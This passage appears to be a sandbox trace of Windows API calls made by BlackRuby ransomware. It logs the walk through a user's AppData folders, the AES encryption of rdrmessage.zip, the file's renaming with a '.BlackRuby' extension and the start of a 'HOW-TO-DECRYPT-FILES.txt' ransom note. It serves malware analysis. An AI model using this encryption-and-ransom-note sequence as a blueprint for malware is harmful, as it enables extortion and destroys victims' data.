lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.977] GetLastError () returned 0x5 [0049.977] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2b [0049.977] GetLastError () returned 0x5 [0049.977] SetErrorMode (uMode=0x1) returned 0x0 [0049.977] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.977] GetLastError () returned 0x5 [0049.978] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.978] GetLastError () returned 0x5 [0049.978] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.978] GetLastError () returned 0x12 [0049.978] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.978] SetErrorMode (uMode=0x0) returned 0x1 [0049.978] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2b [0049.978] GetLastError () returned 0x12 [0049.978] SetErrorMode (uMode=0x1) returned 0x0 [0049.978] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.978] GetLastError () returned 0x12 [0049.978] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.978] GetLastError () returned 0x12 [0049.978] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.978] GetLastError () returned 0x12 [0049.979] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.979] SetErrorMode (uMode=0x0) returned 0x1 [0049.979] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0049.979] GetLastError () returned 0x12 [0049.979] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.979] GetLastError () returned 0x12 [0049.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.979] GetLastError () returned 0x12 [0049.979] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0049.979] GetLastError () returned 0x12 [0049.979] SetErrorMode (uMode=0x1) returned 0x0 [0049.979] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.979] GetLastError () returned 0x12 [0049.979] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.979] GetLastError () returned 0x12 [0049.979] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.979] GetLastError () returned 0x12 [0049.979] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.980] GetLastError () returned 0x12 [0049.980] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.980] GetLastError () returned 0x12 [0049.980] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.980] GetLastError () returned 0x12 [0049.980] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.980] SetErrorMode (uMode=0x0) returned 0x1 [0049.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0049.980] GetLastError () returned 0x12 [0049.980] SetErrorMode (uMode=0x1) returned 0x0 [0049.980] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.980] GetLastError () returned 0x12 [0049.980] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.980] GetLastError () returned 0x12 [0049.980] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.980] GetLastError () returned 0x12 [0049.981] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.981] GetLastError () returned 0x12 [0049.981] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.981] GetLastError () returned 0x12 [0049.981] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.981] GetLastError () returned 0x12 [0049.981] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.981] SetErrorMode (uMode=0x0) returned 0x1 [0049.981] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", lpFilePart=0x0) returned 0x27 [0049.981] GetLastError () returned 0x12 [0049.981] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.981] GetLastError () returned 0x12 [0049.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.981] GetLastError () returned 0x12 [0049.981] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", lpFilePart=0x0) returned 0x27 [0049.981] GetLastError () returned 0x12 [0049.981] SetErrorMode (uMode=0x1) returned 0x0 [0049.981] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.982] GetLastError () returned 0x12 [0049.982] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.982] GetLastError () returned 0x12 [0049.983] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.983] GetLastError () returned 0x12 [0049.983] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.983] GetLastError () returned 0x12 [0049.983] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.983] GetLastError () returned 0x12 [0049.983] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.983] SetErrorMode (uMode=0x0) returned 0x1 [0049.983] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe", lpFilePart=0x0) returned 0x27 [0049.983] GetLastError () returned 0x12 [0049.983] SetErrorMode (uMode=0x1) returned 0x0 [0049.983] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.983] GetLastError () returned 0x12 [0049.983] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.983] GetLastError () returned 0x12 [0049.983] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.983] GetLastError () returned 0x12 [0049.984] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.984] GetLastError () returned 0x12 [0049.984] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.984] GetLastError () returned 0x12 [0049.984] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.984] SetErrorMode (uMode=0x0) returned 0x1 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2f [0049.984] GetLastError () returned 0x12 [0049.984] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.984] GetLastError () returned 0x12 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.984] GetLastError () returned 0x12 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2f [0049.984] GetLastError () returned 0x12 [0049.984] SetErrorMode (uMode=0x1) returned 0x0 [0049.984] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.985] GetLastError () returned 0x12 [0049.985] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.985] GetLastError () returned 0x12 [0049.985] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.985] GetLastError () returned 0x12 [0049.985] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.985] GetLastError () returned 0x12 [0049.985] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.985] SetErrorMode (uMode=0x0) returned 0x1 [0049.985] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2f [0049.985] GetLastError () returned 0x12 [0049.985] SetErrorMode (uMode=0x1) returned 0x0 [0049.985] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.985] GetLastError () returned 0x12 [0049.985] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.986] GetLastError () returned 0x12 [0049.986] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.986] GetLastError () returned 0x12 [0049.986] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.986] GetLastError () returned 0x12 [0049.986] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.986] SetErrorMode (uMode=0x0) returned 0x1 [0049.986] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x34 [0049.986] GetLastError () returned 0x12 [0049.986] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.986] GetLastError () returned 0x12 [0049.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.986] GetLastError () returned 0x12 [0049.986] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x34 [0049.986] GetLastError () returned 0x12 [0049.986] SetErrorMode (uMode=0x1) returned 0x0 [0049.986] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.987] GetLastError () returned 0x12 [0049.987] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.987] GetLastError () returned 0x12 [0049.987] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.987] GetLastError () returned 0x12 [0049.987] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.987] GetLastError () returned 0x12 [0049.987] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.987] GetLastError () returned 0x12 [0049.988] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.988] GetLastError () returned 0x12 [0049.988] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.988] SetErrorMode (uMode=0x0) returned 0x1 [0049.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x34 [0049.988] GetLastError () returned 0x12 [0049.989] SetErrorMode (uMode=0x1) returned 0x0 [0049.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.989] GetLastError () returned 0x12 [0049.989] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.989] GetLastError () returned 0x12 [0049.990] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.990] GetLastError () returned 0x12 [0049.990] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.990] GetLastError () returned 0x12 [0049.990] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.990] GetLastError () returned 0x12 [0049.990] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.990] GetLastError () returned 0x12 [0049.990] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.991] SetErrorMode (uMode=0x0) returned 0x1 [0049.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0049.991] GetLastError () returned 0x12 [0049.991] SetErrorMode (uMode=0x1) returned 0x0 [0049.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), fInfoLevelId=0x0, lpFileInformation=0x1c2826c | out: lpFileInformation=0x1c2826c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe47d0310, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe47d0310, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe593c010, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff)) returned 1 [0049.992] GetLastError () returned 0x12 [0049.992] SetErrorMode (uMode=0x0) returned 0x1 [0049.993] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0049.993] GetLastError () returned 0x12 [0049.993] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0049.993] GetLastError () returned 0x12 [0049.993] SetErrorMode (uMode=0x1) returned 0x0 [0049.993] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.993] GetLastError () returned 0x0 [0049.993] GetFileType (hFile=0x184) returned 0x1 [0049.993] SetErrorMode (uMode=0x0) returned 0x1 [0049.993] GetFileType (hFile=0x184) returned 0x1 [0049.993] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec2c | out: lpFileSizeHigh=0x18ec2c*=0x0) returned 0xa5ff [0049.993] GetLastError () returned 0x0 [0049.993] ReadFile (in: hFile=0x184, lpBuffer=0x1c2a100, nNumberOfBytesToRead=0xa5ff, lpNumberOfBytesRead=0x18ebd4, lpOverlapped=0x0 | out: lpBuffer=0x1c2a100*, lpNumberOfBytesRead=0x18ebd4*=0xa5ff, lpOverlapped=0x0) returned 1 [0050.004] GetLastError () returned 0x0 [0050.004] CloseHandle (hObject=0x184) returned 1 [0050.004] GetLastError () returned 0x0 [0050.004] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0050.004] GetLastError () returned 0x0 [0050.004] SetErrorMode (uMode=0x1) returned 0x0 [0050.004] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), fInfoLevelId=0x0, lpFileInformation=0x18ec3c | out: lpFileInformation=0x18ec3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe47d0310, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe47d0310, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe593c010, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff)) returned 1 [0050.004] GetLastError () returned 0x0 [0050.004] SetErrorMode (uMode=0x0) returned 0x1 [0050.005] CryptAcquireContextW (in: phProv=0x18eb9c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb9c*=0x37c790) returned 1 [0050.005] GetLastError () returned 0x0 [0050.035] CryptImportKey (in: hProv=0x37c790, pbData=0x1c990d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb78 | out: phKey=0x18eb78*=0x360f60) returned 1 [0050.035] GetLastError () returned 0x0 [0050.035] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.035] GetLastError () returned 0x0 [0050.040] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eb34 | out: phKey=0x18eb34*=0x360e20) returned 1 [0050.041] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1cc6124*=0x1, dwFlags=0x0) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1cc60f0, dwFlags=0x0) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc616c*, pdwDataLen=0x18ebc4*=0xa6f0, dwBufLen=0xa6f0 | out: pbData=0x1cc616c*, pdwDataLen=0x18ebc4*=0xa6f0) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdaf78*, pdwDataLen=0x18ebdc*=0x10, dwBufLen=0x10 | out: pbData=0x1cdaf78*, pdwDataLen=0x18ebdc*=0x10) returned 1 [0050.041] GetLastError () returned 0x0 [0050.041] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cdafa8*, pdwDataLen=0x18ebe4*=0x0, dwBufLen=0x10 | out: pbData=0x1cdafa8*, pdwDataLen=0x18ebe4*=0x10) returned 1 [0050.041] GetLastError () returned 0x0 [0050.042] CryptDestroyKey (hKey=0x360f60) returned 1 [0050.042] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.042] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.042] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0050.042] GetLastError () returned 0x0 [0050.042] SetErrorMode (uMode=0x1) returned 0x0 [0050.042] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.043] GetLastError () returned 0xb7 [0050.043] GetFileType (hFile=0x184) returned 0x1 [0050.043] SetErrorMode (uMode=0x0) returned 0x1 [0050.043] GetFileType (hFile=0x184) returned 0x1 [0050.045] CloseHandle (hObject=0x184) returned 1 [0050.045] GetLastError () returned 0xb7 [0050.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpFilePart=0x0) returned 0x43 [0050.045] GetLastError () returned 0xb7 [0050.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Encrypted_fa1FpuFA8BGzZH2iGXKscYtp5F1OGwIYIiJhMD0T.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Encrypted_fa1FpuFA8BGzZH2iGXKscYtp5F1OGwIYIiJhMD0T.BlackRuby", lpFilePart=0x0) returned 0x71 [0050.045] GetLastError () returned 0xb7 [0050.045] SetErrorMode (uMode=0x1) returned 0x0 [0050.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), fInfoLevelId=0x0, lpFileInformation=0x18ec24 | out: lpFileInformation=0x18ec24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe47d0310, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xe47d0310, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x26076c60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xa700)) returned 1 [0050.045] GetLastError () returned 0xb7 [0050.045] SetErrorMode (uMode=0x0) returned 0x1 [0050.045] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Encrypted_fa1FpuFA8BGzZH2iGXKscYtp5F1OGwIYIiJhMD0T.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\encrypted_fa1fpufa8bgzzh2igxkscytp5f1ogwiyiijhmd0t.blackruby")) returned 1 [0050.046] GetLastError () returned 0xb7 [0050.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4d [0050.046] GetLastError () returned 0xb7 [0050.046] SetErrorMode (uMode=0x1) returned 0x0 [0050.046] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: 